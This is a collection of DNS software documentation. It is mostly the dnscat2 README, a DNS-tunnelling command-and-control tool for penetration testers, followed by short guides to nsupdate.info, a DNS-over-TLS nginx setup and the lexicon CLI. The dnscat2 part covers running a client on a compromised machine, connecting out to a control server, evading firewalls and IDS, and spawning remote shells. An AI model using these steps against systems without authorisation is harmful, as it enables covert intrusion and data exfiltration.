
DNS proxy server program - dnscat2


Introduction

Welcome to dnscat2, a DNS tunnel that WON'T make you sick and kill you!
This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.
This README file should contain everything you need to get up and running! If you're interested in digging deeper into the protocol, how the code is structured, future plans, or other esoteric stuff, check out the doc/ folder.

Overview

dnscat2 comes in two parts: the client and the server.
The client is designed to be run on a compromised machine. It's written in C and has the minimum possible dependencies. It should run just about anywhere (if you find a system where it doesn't compile or run, please file a ticket, particularly if you can help me get access to said system).
When you run the client, you typically specify a domain name. All requests will be sent to the local DNS server, which then redirects them to the authoritative DNS server for that domain (which you, presumably, have control of).
If you don't have an authoritative DNS server, you can also use direct connections on UDP/53 (or whatever you choose). They'll be faster, and still look like DNS traffic to the casual viewer, but it's much more obvious in a packet log (all domains are prefixed with "dnscat.", unless you hack the source). This mode will frequently be blocked by firewalls.
The server is designed to be run on an authoritative DNS server. It's written in Ruby and depends on several different gems. When you run it, much like the client, you specify which domain(s) it should listen for in addition to listening for messages sent directly to it on UDP/53. When it receives traffic for one of those domains, it attempts to establish a logical connection. If it receives other traffic, it ignores it by default, but can also forward it upstream.
Detailed instructions for both parts are below.

How is this different from .....

dnscat2 strives to be different from other DNS tunneling protocols by being designed for a special purpose: command and control.
This isn't designed to get you off a hotel network, or to get free Internet on a plane. And it doesn't just tunnel TCP.
It can tunnel any data, with no protocol attached. Which means it can upload and download files, it can run a shell, and it can do those things well. It can also potentially tunnel TCP, but that's only going to be added in the context of a pen-testing tool (that is, tunneling TCP into a network), not as a general purpose tunneling tool. That's been done, it's not interesting (to me).
It's also encrypted by default. I don't believe any other public DNS tunnel encrypts all traffic!

Where to get it

Here are some important links:
  • Sourcecode on Github
  • Downloads (you'll find signed Linux 32-bit, Linux 64-bit, Win32, and source code versions of the client, plus an archive of the server - keep in mind that the signature file is hosted on the same server as the files, so if you're worried, please verify my PGP key :) )
  • User documentation - a collection of files, both for end-users (like the Changelog) and for developers (like the Contributing doc)
  • Issue tracker (you can also email me issues, just put my first name (ron) in front of my domain name (skullsecurity.net))

How to play

The theory behind dnscat2 is simple: it creates a tunnel over the DNS protocol.
Why? Because DNS has an amazing property: it'll make its way from server to server until it figures out where it's supposed to go.
That means that for dnscat to get traffic off a secure network, it simply has to send messages to a DNS server, which will happily forward things through the DNS network until it gets to your DNS server.
That, of course, assumes you have access to an authoritative DNS server. dnscat2 also supports "direct" connections - that is, running a dnscat client that directly connects to your dnscat on your ip address and UDP port 53 (by default). The traffic still looks like DNS traffic, and might get past dumber IDS/IPS systems, but is still likely to be stopped by firewalls.
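To make that concrete, here's a minimal Python sketch of the idea - not the dnscat2 protocol itself, which adds sessions, sequencing, and encryption as described in doc/protocol.md - showing how arbitrary bytes can be hex-encoded into a query name and handed to the ordinary stub resolver. The domain and chunk size are placeholders:

# Conceptual sketch only: arbitrary bytes riding inside an ordinary DNS
# lookup. The stub resolver forwards the query upstream until it reaches
# the authoritative server for the chosen domain.
import binascii
import socket

def encode_query_name(payload: bytes, domain: str = "example.com") -> str:
    # Hex keeps the name within the allowed DNS alphabet; a real tool also
    # has to respect the 63-byte label and 255-byte name limits.
    hexdata = binascii.hexlify(payload).decode("ascii")
    labels = [hexdata[i:i + 60] for i in range(0, len(hexdata), 60)]
    return ".".join(labels + [domain])

name = encode_query_name(b"hello from inside the network")
print("would query:", name)

try:
    # Any answer (even NXDOMAIN) proves the query reached the authoritative
    # server, which is all a tunnel needs.
    socket.getaddrinfo(name, None)
except socket.gaierror as exc:
    print("resolver answered:", exc)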
If you aren't clear on how to set up an authoritative DNS server, it's something you have to set up with a domain provider. izhan helpfully wrote a guide for you!

Compiling

Client

Compiling the client should be pretty straightforward - all you should need to compile is make/gcc (for Linux) or either Cygwin or Microsoft Visual Studio (for Windows). Here are the commands on Linux:
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make
On Windows, load client/win32/dnscat2.vcproj into Visual Studio and hit "build". I created and tested it on Visual Studio 2008 - until I get a free legit copy of a newer version, I'll likely be sticking with that one. :)
If compilation fails, please file a bug on my github page! Please send details about your system.
You can verify dnscat2 is successfully compiled by running it with no flags; you'll see it attempting to start a DNS tunnel with whatever your configured DNS server is (which will fail):
$ ./dnscat
Starting DNS driver without a domain! This will only work if you
are directly connecting to the dnscat2 server.

You'll need to use --dns server= if you aren't.

** WARNING!
*
* It looks like you're running dnscat2 with the system DNS server,
* and no domain name!
*
* That's cool, I'm not going to stop you, but the odds are really,
* really high that this won't work. You either need to provide a
* domain to use DNS resolution (requires an authoritative server):
*
* dnscat mydomain.com
*
* Or you have to provide a server to connect directly to:
*
* dnscat --dns=server=1.2.3.4,port=53
*
* I'm going to let this keep running, but once again, this likely
* isn't what you want!
*
** WARNING!

Creating DNS driver:
domain = (null)
host = 0.0.0.0
port = 53
type = TXT,CNAME,MX
server = 4.2.2.1
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: DNS: RCODE_NAME_ERROR
[[ ERROR ]] :: The server hasn't returned a valid response in the last 10 attempts.. closing session.
[[ FATAL ]] :: There are no active sessions left! Goodbye!
[[ WARNING ]] :: Terminating

Server

The server isn't "compiled", as such, but it does require some Ruby dependencies. Unfortunately, Ruby dependencies can be annoying to get working, so good luck! If any Ruby experts out there want to help make this section better, I'd be grateful!
I'm assuming you have Ruby and Gem installed and in working order. If they aren't, install them with apt-get, emerge, rvm, or however is normal on your operating system.
Once Ruby/Gem are sorted out, run these commands (note: you can obviously skip the git clone command if you already installed the client and skip gem install bundler if you've already installed bundler):
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ gem install bundler
$ bundle install
If you get a permissions error with gem install bundler or bundle install, you may need to run them as root. If you have a lot of problems, uninstall Ruby/Gem and install everything using rvm and without root.
If you get an error that looks like this:
/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- mkmf (LoadError)
It means you need to install the -dev version of Ruby:
$ sudo apt-get install ruby-dev
I find that sudo isn't always enough to get everything working right; I sometimes have to switch to root and work directly as that account. rvmsudo doesn't help, because it breaks ctrl-z.
You can verify the server is working by running it with no flags and seeing if you get a dnscat2> prompt:
# ruby ./dnscat2.rb

New window created: 0
Welcome to dnscat2! Some documentation may be out of date.

passthrough => disabled
auto_attach => false
auto_command =>
process =>
history_size (for new windows) => 1000
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2>
If you don't run it as root, you might have trouble listening on UDP/53 (you can use --dnsport to change it). You'll see an error message if that's the case.

Ruby as root

If you're having trouble running Ruby as root, this is what I do to run it the first time:
$ cd dnscat2/server
$ su
# gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
# \curl -sSL https://get.rvm.io | bash
# source /etc/profile.d/rvm.sh
# rvm install 1.9
# rvm use 1.9
# bundle install
# ruby ./dnscat2.rb
And subsequent times:
$ cd dnscat2/server
$ su
# source /etc/profile.d/rvm.sh
# ruby ./dnscat2.rb
rvmsudo should make it easier, but dnscat2 doesn't play well with rvmsudo unfortunately.

Usage

Client + server

Before we talk about how to specifically use the tools, let's talk about how dnscat is structured. The dnscat tool is divided into two pieces: a client and a server. As you noticed if you went through the compilation, the client is written in C and the server is in Ruby.
Generally, the server is run first. It can be long lived, and handle as many clients as you'd like. As I said before, it's basically a C&C service.
Later, a client is run, which opens a session with the server (more on sessions below). The session can either traverse the DNS hierarchy (recommended, but more complex) or connect directly to the server. Traversing the DNS hierarchy requires an authoritative domain, but will bypass most firewalls. Connecting directly to the server is more obvious for several reasons.
By default, connections are automatically encrypted (turn it off on the client with --no-encryption and on the server with --security=open). When establishing a new connection, if you're paranoid about man-in-the-middle attacks, you have two options for verifying the peer:
  • Pass a pre-shared secret using the --secret argument on both sides to validate the connection
  • Manually verify the "short authentication string" - a series of words that are printed on both the client and server after encryption is negotiated

Running a server

The server - which is typically run on the authoritative DNS server for a particular domain - is designed to be feature-ful, interactive, and user friendly. It's written in Ruby, and much of its design is inspired by Metasploit and Meterpreter.
If you followed the compilation instructions above, you should be able to just run the server:
$ ruby ./dnscat2.rb skullseclabs.org
Where "skullseclabs.org" is your own domain. If you don't have an authoritative DNS server, it isn't mandatory; but this tool works way, way better with an authoritative server.
That should actually be all you need! Other than that, you can test it using the client's --ping command on any other system, which should be available if you've compiled it:
$ ./dnscat --ping skullseclabs.org
If the ping succeeds, your C&C server is probably good! If you ran the DNS server on a different port, or if you need to use a custom DNS resolver, you can use the --dns flag in addition to --ping:
$ ./dnscat --dns server=8.8.8.8,domain=skullseclabs.org --ping

$ ./dnscat --dns port=53531,server=localhost,domain=skullseclabs.org --ping
Note that when you specify a --dns argument, the domain has to be part of that argument (as domain=xxx). You can't just pass it on the commandline (due to a limitation of my command parsing; I'll likely improve that in a future release).
When the process is running, you can start a new server using basically the exact same syntax:
dnscat2> start --dns=port=53532,domain=skullseclabs.org,domain=test.com
New window created: dns2
Starting Dnscat2 DNS server on 0.0.0.0:53532
[domains = skullseclabs.org, test.com]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following:
./dnscat2 skullseclabs.org
./dnscat2 test.com

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53532

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53532.
You can run as many DNS listeners as you want, as long as they're on different hosts/ports. Once the data comes in, the rest of the process doesn't even know which listener the data came from; in fact, a client can send different packets to different ports, and the session will continue as expected.

Running a client

The client - which is typically run on a system after compromising it - is designed to be simple, stable, and portable. It's written in C and has as few library dependencies as possible, and compiles/runs natively on Linux, Windows, Cygwin, FreeBSD, and Mac OS X.
The client is given the domain name on the commandline, for example:
./dnscat2 skullseclabs.org
In that example, it will create a C&C session with the dnscat2 server running on skullseclabs.org. If an authoritative domain isn't an option, it can be given a specific ip address to connect to instead:
./dnscat2 --dns host=206.220.196.59,port=5353
Assuming there's a dnscat2 server running on that host/port, it'll create a session there.

Tunnels

Yo dawg; I hear you like tunnels, so now you can tunnel a tunnel through your tunnel!
It is currently possible to tunnel a connection through dnscat2, similar to "ssh -L"! Other modes ("ssh -D" and "ssh -R") are coming soon as well!
After a session has started (a command session), the command "listen" is used to open a new tunnelled port. The syntax is roughly the same as ssh -L:
listen [lhost:]lport rhost:rport
The local host is optional and defaults to all interfaces (0.0.0.0). The local port and remote host/port are mandatory.
The dnscat2 server will listen on lport. All connections received to that port are forwarded, via the dnscat2 client, to the remote host/port chosen.
For example, this will listen on port 4444 (on the server) and forward traffic to google:
listen 4444 www.google.com:80
Then, if you connect to http://localhost:4444, it'll come out the dnscat2 client and connect to google.com.
Let's say you're using this on a pentest and you want to forward ssh connections through the dnscat2 client (running on somebody's corp network) to an internal device. You can!
listen 127.0.0.1:2222 10.10.10.10:22
That'll only listen on the localhost interface on the dnscat2 server, and will forward connections via the tunnel to port 22 of 10.10.10.10.
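As a rough illustration of the ssh -L semantics that listen mimics, the sketch below accepts connections on lhost:lport and relays bytes to rhost:rport. In dnscat2 the relay leg actually travels through the DNS session via the client; this Python sketch only shows the forwarding concept, using the addresses from the pentest example above:

# Minimal port-forwarding sketch (ssh -L style): accept a local TCP
# connection and relay bytes to the remote side. dnscat2 does the relay
# through its DNS session instead of a direct socket.
import socket
import threading

def pipe(src: socket.socket, dst: socket.socket) -> None:
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    finally:
        dst.close()

def listen(lhost: str, lport: int, rhost: str, rport: int) -> None:
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((lhost, lport))
    server.listen()
    while True:
        client, _ = server.accept()
        remote = socket.create_connection((rhost, rport))
        threading.Thread(target=pipe, args=(client, remote), daemon=True).start()
        threading.Thread(target=pipe, args=(remote, client), daemon=True).start()

# listen("127.0.0.1", 2222, "10.10.10.10", 22)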

Encryption

dnscat2 is encrypted by default.
I'm not a cryptographer, and by necessity I came up with the encryption scheme myself. As a result, I wouldn't trust this 100%. I think I did a pretty good job preventing attacks, but this hasn't been professionally audited. Use with caution.
There is a ton of technical information about the encryption in the protocol doc. But here are the basics.
By default, both the client and the server support and will attempt encryption. Each connection uses a new keypair, negotiated by ECDH. All encryption is done by salsa20, and signatures use sha3.
Encryption can be disabled on the client by passing --no-encryption on the commandline, or by compiling it using make nocrypto.
The server will reject unencrypted connections by default. To allow unencrypted connections, pass --security=open to the server, or run set security=open on the console.
By default, there's no protection against man-in-the-middle attacks. As mentioned before, there are two different ways to gain MitM protection: a pre-shared secret or a "short authentication string".
A pre-shared secret is passed on the commandline to both the client and the server, and is used to authenticate both the client to the server and the server to the client. It should be a somewhat strong value - something that can't be quickly guessed by an attacker (there's only a short window for the attacker to guess it, so it only has to hold up for a few seconds).
The pre-shared secret is passed in via the --secret parameter on both the client and the server. The server can change it at runtime using set secret=, but that can have unexpected results if active clients are connected.
Furthermore, the server can enforce that only authenticated connections are allowed by using --security=authenticated or set security=authenticated. That's enabled by default if you pass the --secret parameter.
If you don't require the extra effort of authenticating connections, then a "short authentication string" is displayed by both the client and the server. The short authentication string is a series of English words that are derived based on the secret values that both sides share.
If the same set of English words are printed on both the client and the server, the connection can be reasonably considered to be secure.
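As a rough illustration of the general idea - the real derivation is specified in the protocol doc, and the word list, hash, and truncation below are invented for the example - both sides can hash the shared session secret and map the digest onto a word list; matching words imply matching secrets:

# Illustrative only: map a digest of the shared secret onto words.
# dnscat2's exact construction lives in doc/protocol.md.
import hashlib

WORDS = ["alpha", "bravo", "charlie", "delta", "echo", "foxtrot",
         "golf", "hotel", "india", "juliet", "kilo", "lima",
         "mike", "november", "oscar", "papa"]  # 16 words -> 4 bits per word

def short_auth_string(shared_secret: bytes, count: int = 6) -> str:
    digest = hashlib.sha3_256(shared_secret).digest()
    return " ".join(WORDS[b & 0x0F] for b in digest[:count])

print(short_auth_string(b"negotiated-session-secret"))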
That's about all you need to know about the encryption! See the protocol doc for details! I'd love to hear any feedback on the crypto, as well. :)
And finally, if you have any problems with the crypto, please let me know! By default a window called "crypto-debug" will be created at the start. If you have encryption problems, please send me that log! Or, better yet, run dnscat2 with the --firehose and --packet-trace arguments, and send me EVERYTHING! Don't worry about revealing private keys; they're only used for that one session.

dnscat2's Windows

The dnscat2 UI is made up of a bunch of windows. The default window is called the 'main' window. You can get a list of windows by typing windows (or sessions) into any command prompt:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = skullseclabs.org [*]
You'll note that there are two windows - window 0 is the main window, and window dns1 is the listener (technically referred to as the 'tunnel driver').
From any window that accepts commands (main and command sessions), you can type help to get a list of commands:
dnscat2> help

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
For any of those commands, you can use -h or --help to get details:
dnscat2> window --help
Error: The user requested help

Interact with a window
-i, --i= Interact with the chosen window
-h, --help Show this message
We'll use the window command to interact with dns1, which is a status window:
dnscat2> window -i dns1
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53531
[domains = skullseclabs.org]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following:
./dnscat2 skullseclabs.org

To talk directly to the server without a domain name, run:
./dnscat2 --dns server=x.x.x.x,port=53531

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53531.

Received: dnscat.9fa0ff178f72686d6c716c6376697968657a6d716800 (TXT)
Sending: 9fa0ff178f72686d6c716c6376697968657a6d716800
Received: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org (MX)
Sending: d17cff3e747073776c776d70656b73786f646f616200.skullseclabs.org
The received and sent strings there are, if you decode them, pings.
You can switch to the 'parent' window (in this case, main) by pressing ctrl-z. If ctrl-z kills the process, then you probably have to find a better way to run it (rvmsudo doesn't work, see above).
When a new client connects and creates a session, you'll be notified in main (and certain other windows):
New window created: 1
dnscat2>
(Note that you have to press enter to get the prompt back)
You can switch to the new window the same way we switched to the dns1 status window:
dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command session (ubuntu-64) 1>
Command sessions can spawn additional sessions; for example, the shell command:
command session (ubuntu-64) 1> shell
Sent request to execute a shell
New window created: 2
Shell session created!

command session (ubuntu-64) 1>
(Note that throughout this document I'm cleaning up the output; usually you have to press enter to get the prompt back)
Then, if you return to the main session (ctrl-z or suspend), you'll see it in the list of windows:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]
Unfortunately, the 'windows' command in a specific command session only shows child windows from that session, and right now new sessions aren't spawned as children.
Note that some sessions have [*] - that means that there's been activity since the last time we looked at them.
When you interact with a session, the interface will look different depending on the session type. As you saw with the default session type (command sessions) you get a UI just like the top-level session (you can type 'help' or run commands or whatever). However, if you interact with a 'shell' session, you won't see much immediately, until you type a command:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]

dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

sh (ubuntu-64) 2> pwd
/home/ron/tools/dnscat2/client
To escape this, you can use ctrl-z or type "exit" (which will kill the session).
Lastly, to kill a session, the kill command can be used:
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)
2 :: sh (ubuntu-64) [*]
dnscat2> kill 2
Session 2 has been sent the kill signal!
Session 2 has been killed
dnscat2> windows
0 :: main [active]
dns1 :: DNS Driver running on 0.0.0.0:53531 domains = skullseclabs.org [*]
1 :: command session (ubuntu-64)

History

In the past, there were several DNS tunneling tools. One was called dnscat, written by Tadek Pietraszek. The problem is, it's written in Java, and I really wanted something that could run basically everywhere.
That version of dnscat was based on a tool called NSTX, whose page no longer exists and isn't even in the Wayback Machine, so I know nothing about it.
Later, I wrote a C implementation and called it dnscat (without permission), since the previous Java version was unmaintained and I really liked the name (I toyed with calling it dnscat-ng, but -ng is a bit wordy for my taste). It worked, but there were a lot of problems. The client and server were the same tool, like netcat, which, because DNS is such a client/server model, didn't work out that well. The other problem was that I had linked it too much to the DNS protocol, so it could only run over DNS.
dnscat2 - the successor to dnscat - is an attempt to right some of the wrongs that I had committed. dnscat2 has a separate server (Ruby) and client (C) and treats everything as a stream of bytes, and uses a driver, of sorts, to convert that stream of bytes into dns requests and back. Thus, it's a layered protocol, with DNS being a lower layer.
As a result, I invented a protocol that I'm calling the dnscat protocol. You can find documentation about it in docs/protocol.md. It's a simple polling network protocol, where the client occasionally polls the server, and the server responds with a message (or an error code). The protocol is designed to be resilient to the various issues I had with dnscat1 - that is, it can handle out-of-order packets, dropped packets, and duplicated packets equally well.


Dynamic DNS service - nsupdate.info

Dynamic DNS service 

About nsupdate.info

https://nsupdate.info is a free dynamic DNS service.
nsupdate.info is also the name of the software used to implement it. If you like, you can use it to host the service on your own server.

Features


  • Frontend: dynamic DNS updates via the dyndns2 protocol (as supported by many DSL/cable routers and update clients; a minimal client sketch follows this list).
  • Backends:
    • Uses Dynamic DNS UPDATE protocol (RFC 2136) to update compatible nameservers like BIND, PowerDNS and others (the nameserver itself is not included).
    • Optionally uses the dyndns2 protocol to update other services - we can send updates to configurable third-party services when we receive an update from the router / update client.
  • Prominently shows visitor's IP addresses (v4 and v6) on main view, shows reverse DNS lookup results (on host overview view).
  • Multiple Hosts per user (using separate secrets for security)
  • Add own domains / nameservers (public or only for yourself)
  • Related Hosts: support updating DNS records of other hosts in same LAN by a single updater (e.g. for IPv6 with changing prefix, IPv4 also works)
  • Login with local or remote accounts (Google, GitHub, Bitbucket, ... accounts - everything supported by the python-social-auth package)
  • Manual IP updates via web interface
  • Browser-based update client for temporary/adhoc usage
  • Shows time since last update via API, whether it used TLS or not
  • Shows IP v4 and v6 addresses (from master nameserver records)
  • Shows client / server fault counters, available and abuse flags
  • Supports IP v4 and v6, TLS.
  • Easy and simple web interface, it tries to actively help to configure routers / update clients / nameservers.
  • Made with security and privacy in mind
  • No nagging, no spamming, no ads - trying not to annoy users
  • Free and open source software, made with Python and Django
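As a concrete illustration of the dyndns2 frontend mentioned above, here's a minimal Python update client sketch. The hostname, secret, and endpoint are placeholders based on the dyndns2 convention - the service's web interface shows the exact URL and per-host secret to use:

# Hedged sketch of a dyndns2-style update, the frontend protocol listed
# above. Hostname, secret and endpoint are placeholders.
import base64
import urllib.request

HOST = "myhost.nsupdate.info"      # your dynamic hostname
SECRET = "per-host-secret"         # the secret generated for that host
URL = f"https://ipv4.nsupdate.info/nic/update?hostname={HOST}"  # assumed endpoint

request = urllib.request.Request(URL)
credentials = base64.b64encode(f"{HOST}:{SECRET}".encode()).decode()
request.add_header("Authorization", f"Basic {credentials}")

with urllib.request.urlopen(request) as response:
    # dyndns2 servers reply with strings like "good <ip>" or "nochg <ip>"
    print(response.read().decode())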

Tutorial to set up DNS-over-TLS (DoT)

This guide will help you reuse your setup for DNS-over-HTTPS (DoH) to add support for DNS-over-TLS (DoT). The best part? You won't need new tools after you've followed my previous guides: DNS-over-HTTPS or Pihole and DoH.

Introduction

DNS-over-TLS (DoT) is different from DNS-over-HTTPS (DoH).
DoH is used by different applications like DNSCrypt, Intra, etc. In other words, there isn't any OS-level implementation of it; you always need a separate app to use it.
DoT, by contrast, is supported directly in Android 9 (Pie).
It's important to note that in both cases the traffic is encrypted, so your ISP or any company between you and the server can't see what your DNS requests are. They're just two different ways of doing the same thing.

DNS-over-HTTPS (DoH)

In DoH, you’re using an HTTPS server to relay the DNS request to your DNS server. The request are encoded in a specific format, usually in JSON.
For more information, I advise you to check my DNS-over-HTTP Tutorial.
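For illustration, a minimal DoH query in that JSON flavour might look like the sketch below. The endpoint used here is Cloudflare's public JSON API, standing in for whatever DoH server you set up in that guide:

# Minimal DoH query in the JSON flavour: ask for an A record and print
# the answers. Swap the endpoint for your own DoH server if you have one.
import json
import urllib.request

url = "https://cloudflare-dns.com/dns-query?name=aaflalo.me&type=A"
req = urllib.request.Request(url, headers={"Accept": "application/dns-json"})

with urllib.request.urlopen(req) as resp:
    answer = json.load(resp)

for record in answer.get("Answer", []):
    print(record["name"], record["type"], record["data"])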

DNS-over-TLS (DoT)

DNS over TLS (DoT) is a security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks.
WIKIPEDIA
Basically, you’re going to encapsulate DNS traffic into a TLS stream to encrypt the request and use TCP instead of UDP. The default port is 853.

Tutorial

If you’ve followed already my guide on how to setup DoH, you have everything you need.
If you didn’t, I advise you to follow it to be able to easily generate an HTTPS certificate with Certbot. If you already have a certificate, great, you’re good to go.
If you don’t have a certificate ready, I recommend you to set it up with Certbot and DNS validation (like with CloudFlare) or to follow the DoH guide.

NGINX

NGINX is an amazing tool: not only is it an HTTP server, it can also be used to encapsulate any stream in a TLS stream. This is exactly what we want.

Streams

First, you’ll need to create a new directory in your NGINX install directory to store the stream configuration.
sudo mkdir /etc/nginx/streams/

TLS

Now, grab the path to your HTTPS key and certificate from the NGINX site configuration file you created for DoH.
If you used Certbot, it's going to look like this, where dns.aaflalo.me will be your domain.
ssl_certificate /etc/letsencrypt/live/dns.aaflalo.me/fullchain.pem; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/live/dns.aaflalo.me/privkey.pem; # managed by Certbot
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
Now that you have the SSL configuration, we’re gonna create the stream configuration to redirect DoT traffic to your DNS server.

DNS-over-TLS

Create the dns-over-tls configuration file and use your favourite editor to set its content:
/etc/nginx/streams/dns-over-tls
upstream dns-servers {
    server 127.0.0.1:53;
}

server {
    listen 853 ssl; # managed by Certbot

    ssl_certificate /etc/letsencrypt/live/dns.aaflalo.me/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/dns.aaflalo.me/privkey.pem; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot

    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers HIGH:!aNULL:!MD5;
    ssl_handshake_timeout 10s;
    ssl_session_cache shared:SSL:20m;
    ssl_session_timeout 4h;

    proxy_pass dns-servers;
}
I’ve highlighted the lines you need to change for your own configuration. The server in dns-servers need to point to the DNS server you want to use. May it be your Pihole, or your DNSCrypt server, etc … You can put multiple server as well.

Activate Streams

The last step is to tell NGINX to look into our /etc/nginx/streams folder to activate the stream.
Edit the file /etc/nginx/nginx.conf and add the following piece of code after the http block (or just at the end of the file):
stream {
    include /etc/nginx/streams/*;
}
Now you just need to restart NGINX, and you'll have a DoT server listening on port 853.
sudo systemctl restart nginx

Firewall

Don’t forget to open the TCP port 853 on your firewall to be able to access the server.

Test

To test your DoT server, you can use the service provided by GetDNS.
GetDNS Interface
How to use the Querier:
  1. Set Transport order: set it to TLS.
  2. Set TLS resolver IP: the public IP of your server.
  3. TLS auth name: the FQDN (full name) of your server certificate - the one you used to generate the TLS certificate.
  4. Query: put the domain you want to query, like aaflalo.me or google.com, and select an A query.
  5. Push the button and check that there is a result.



lexicon


Manipulate DNS records on various DNS providers in a standardized/agnostic way.

Introduction

Lexicon provides a way to manipulate DNS records on multiple DNS providers in a standardized way. Lexicon has a CLI but it can also be used as a python library.
Lexicon was designed to be used in automation, specifically letsencrypt.

Providers

Only DNS providers who have an API can be supported by lexicon.
The current supported providers are:
Potential providers are as follows. If you would like to contribute one, follow the CONTRIBUTING.md and then open a pull request.
  • Azure DNS (docs)
  • AHNames (docs)
  • DurableDNS (docs) - can't set TXT records
  • cyon.ch
  • Dyn (docs) 💵 requires paid account
  • Dynu
  • DirectAdmin
  • EntryDNS (docs) 💵 requires paid account
  • FreeDNS (docs)
  • Host Virtual DNS (docs) 💵 requires paid account
  • HostEurope
  • Infoblox NIOS
  • ironDNS (docs) 💵 requires paid account
  • ISPConfig
  • InternetX autoDNS (docs)
  • Knot DNS
  • KingHost
  • Liquidweb (docs) 💵 requires paid account
  • Loopia (docs) 💵 requires paid account
  • Mythic Beasts (docs)
  • NFSN (NearlyFreeSpeech) (docs) 💵 requires paid account
  • RFC2136 (docs)
  • Servercow (docs)
  • selectel.com
  • TELE3 (docs)
  • UltraDNS (docs) 💵 requires paid account
  • UnoEuro API
  • VSCALE
  • WorldWideDns (docs) 💵 requires paid account
  • Zerigo (docs) 💵 requires paid account
  • Zoneedit (docs)
  • Any others I missed

Setup

Warning: when using pip, it is strongly advised to install Lexicon in a Python virtual environment, in order to avoid interference between Python modules preinstalled on your system as OS packages and modules installed by pip (see https://docs.python-guide.org/dev/virtualenvs/).
To use lexicon as a CLI application, do the following:
pip install dns-lexicon
Some providers (like Route53 and TransIP) require additional dependencies. You can install provider specific dependencies separately:
pip install dns-lexicon[route53]
To install lexicon with the additional dependencies of every provider, do the following:
pip install dns-lexicon[full]
You can also install the latest version from the repository directly.
pip install git+https://github.com/AnalogJ/lexicon.git
and with Route 53 provider dependencies:
pip install git+https://github.com/AnalogJ/lexicon.git#egg=dns-lexicon[route53]
As an alternative you can also install Lexicon using the OS packages available for major Linux distributions (see the lexicon or dns-lexicon package in https://pkgs.org/download/lexicon).

Usage

$ lexicon -h
usage: lexicon [-h] [--version] [--delegated DELEGATED]
{cloudflare,cloudxns,digitalocean,dnsimple,dnsmadeeasy,dnspark,dnspod,easydns,luadns,namesilo,nsone,pointhq,rage4,route53,vultr,yandex,zonomi}
...

Create, Update, Delete, List DNS entries

positional arguments:
{cloudflare,cloudxns,digitalocean,dnsimple,dnsmadeeasy,dnspark,dnspod,easydns,luadns,namesilo,nsone,pointhq,rage4,route53,vultr,yandex,zonomi}
specify the DNS provider to use
cloudflare cloudflare provider
cloudxns cloudxns provider
digitalocean digitalocean provider
...
rage4 rage4 provider
route53 route53 provider
vultr vultr provider
yandex yandex provider
zonomi zonomi provider

optional arguments:
-h, --help show this help message and exit
--version show the current version of lexicon
--delegated DELEGATED
specify the delegated domain


$ lexicon cloudflare -h
usage: lexicon cloudflare [-h] [--name NAME] [--content CONTENT] [--ttl TTL]
[--priority PRIORITY] [--identifier IDENTIFIER]
[--auth-username AUTH_USERNAME]
[--auth-token AUTH_TOKEN]
{create,list,update,delete} domain
{A,AAAA,CNAME,MX,NS,SPF,SOA,TXT,SRV,LOC}

positional arguments:
{create,list,update,delete}
specify the action to take
domain specify the domain, supports subdomains as well
